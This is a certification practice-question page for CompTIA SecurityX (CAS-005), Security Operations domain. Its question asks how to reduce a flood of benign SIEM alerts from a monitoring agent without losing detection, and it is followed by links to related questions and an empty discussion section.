CAS-005
Security Operations
medium
Question 5 of 22

A security analyst notices that the SIEM is generating thousands of alerts per day for a specific rule, but investigation reveals that nearly all of them are benign events from a monitoring agent. Which SIEM management action BEST resolves this without eliminating detection capability?

ADelete the rule from the SIEM
BTune the rule to exclude events from the monitoring agent's known source identifier while preserving alerts for all other sources
CIncrease the SIEM storage capacity to handle the alert volume
DForward the excess alerts to a secondary SIEM

More Security Operations Questions

22 questions

Full CompTIA SecurityX Practice Test

All topics covered

All CompTIA SecurityX Questions

Browse by topic

Related Questions

Which format is used to share structured threat intelligence indicators, including IoCs, TTPs, and t...

easy

Which internal threat hunting technique deploys decoy systems or credentials to detect attacker late...

easy

A SOC analyst is investigating a suspected intrusion. The analyst discovers an executable that was n...

medium

A threat hunter is searching for signs of command-and-control traffic in network logs. The hunter ne...

medium

A SIEM is generating a high volume of alerts for failed SSH login attempts from internal IP addresse...

medium
View all Security Operations questions

Educational Content — CertQnA practice questions are written against official exam objectives, covering the same domains tested on the real exam. All content is original and independent — not actual exam questions, not affiliated with any certification vendor. Learn more about our content policy

Discussion

Be the first to share your understanding of this concept

⚠️ Discussion is for concept clarification only. Do not share or request actual exam questions or answers.

Sign in to join the discussion

Sign InCreate free account